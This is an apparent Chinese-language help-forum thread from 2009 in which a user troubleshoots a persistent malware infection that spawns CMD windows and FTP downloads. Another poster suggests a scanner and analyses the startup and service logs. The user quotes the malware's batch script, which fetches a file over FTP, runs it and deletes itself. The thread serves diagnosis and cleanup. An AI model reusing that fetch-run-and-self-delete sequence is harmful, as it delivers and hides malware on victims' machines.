里面文件都没有    服务  启动    都关了    也就是说  电脑还是我提问题的时候的样子啊!  但是现在还是自动定时运行CMD  自动生成那些文件

你确定我说的你都做了？
新日志发上来看看

又生成了一个
ftp -s:tencent.sys
start C:\tmd.exe
start C:\tmd.exe
del tencent.sys
del %0

附件: 扫描.log (2009-2-27 23:15:09, 48.00 K)
该附件被下载次数 89

附件: 病毒.rar (2009-2-27 23:15:09, 13.32 K)
该附件被下载次数 144

刚刚又自动生成了些文件!

又进行FTP连接

..........
试试大蜘蛛吧

不行的话
我就没辙了


ftp://ftp.drweb.com/pub/drweb/cureit/launch.exe

记得
开始后要立即中止杀毒
这个程序，默认的是快速扫描

你选中止之后，选择全面扫描再扫描

能进安全模式扫描最好

我把病毒文件传到瑞星的邮件了    看他们怎么解决!  本来想给你的  可惜我已经手动删了!  还有    setuplp    这个也蛮多人中了    网上也没有好的解决方案!哎! 我电脑里面的毒是07年9月杀到现在还没有杀完!  不知道是什么毒! 用瑞星查不出毒!    还是我自己看些文件象病毒就删    服务项感觉不好就禁止    !

aaccbbdd      谢谢了啊!  现在虽然电脑里面有毒    但是我想应该是下栽器    有防火墙禁止连接是没有问题了吧!  扫描出来的那些东西我早就手动解决了!  就是不知道哪里有问题啊!  老是自动运行CMD  释放文件    自动FTP  下栽 病毒!

再次强调

你这情况
最好安装规则包

先看你第一个日志：
下面不认识的异常项目：
启动项目
注册表
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices]
    <Windows Virtual Assistance><hpms2wtn.exe>  [N/A]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    <soft><; c:\Softsetup.exe>  [File is missing]
==================================
服务
[0S0JB5N29R / 0S0JB5N29R][Stopped/Disabled]
  <C:\WINDOWS\J9VT5CHCGGBB.exe -AW8AZKQFO><(File is missing)>

[bixdct / bixdct][Stopped/Auto Start]
  <C:\WINDOWS\system32\svchost.exe -k bixdct-->%SystemRoot%\System32\dathue.dll><N/A>

[DC9952A6 / DC9952A6][Stopped/Disabled]
  <C:\WINDOWS\Fonts\A1845C9E.EXE -k><(File is missing)>

[diqgda / diqgda][Stopped/Auto Start]
  <C:\WINDOWS\system32\svchost.exe -k diqgda-->%SystemRoot%\System32\vuwjoh.dll><N/A>

[COM+ Disk Manager / DiskManager][Stopped/Auto Start]
  <C:\WINDOWS\system32\svchost.exe -k DiskManager-->%SystemRoot%\System32\okxhxf.dll><N/A>

[Event Protocol Service / EventService][Stopped/Auto Start]
  <C:\WINDOWS\system32\SVCHOST.EXE -k EventService-->%SystemRoot%\System32\tttwez.fsl><N/A>

[GameSrv / GameSrv][Running/Auto Start]
  <C:\Program Files\gamenet\CENTCOMM.EXE><>

[TCP/IP NetCOMS Helpen / LmHostne][Stopped/Auto Start]
  <C:\WINDOWS\system32\system.exe><(File is missing)>

[qhddcj / qhddcj][Stopped/Disabled]
  <C:\WINDOWS\system32\svchOST.Exe -kqhddcj-->%SYSTEMROOT%\SYSTEM32\mcrpjb.DLL><N/A>

[skctrp / skctrp][Stopped/Auto Start]
  <C:\WINDOWS\system32\svchost.exe -k skctrp-->%SystemRoot%\System32\dxdwcl.dll><N/A>

[socr / socr][Stopped/Disabled]
  <C:\WINDOWS\system32\svchost.exe -k socr-->%SystemRoot%\System32\oymhfi.dll><N/A>

从下面进程看，竟然是两个个桌面进程，怎么了？？
==================================
正在运行的进程
[PID: 1976 / Administrator][C:\WINDOWS\Explorer.EXE]  [(Verified) Microsoft Corporation, 6.00.3790.1830 (srv03_sp1_rtm.050324-1447)]

[PID: 3504 / Administrator][C:\WINDOWS\Explorer.EXE]  [(Verified) Microsoft Corporation, 6.00.3790.1830 (srv03_sp1_rtm.050324-1447)]

再看你第二个日志，有些东西还在，到底是什么呢？？

启动项目
注册表
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices]
    <Windows Virtual Assistance><hpms2wtn.exe>  [N/A]
==================================
服务
[COM+ Disk Manager / DiskManager][Stopped/Auto Start]
  <C:\WINDOWS\system32\svchost.exe -k DiskManager-->%SystemRoot%\System32\okxhxf.dll><N/A>

[Event Protocol Service / EventService][Stopped/Auto Start]
  <C:\WINDOWS\system32\SVCHOST.EXE -k EventService-->%SystemRoot%\System32\tttwez.fsl><N/A>

[GameSrv / GameSrv][Running/Auto Start]
  <C:\Program Files\gamenet\CENTCOMM.EXE><>

[TCP/IP NetCOMS Helpen / LmHostne][Stopped/Auto Start]
  <C:\WINDOWS\system32\system.exe><(File is missing)>

按照你1楼提供的三个图来看

很难判断是否是感染性的病毒。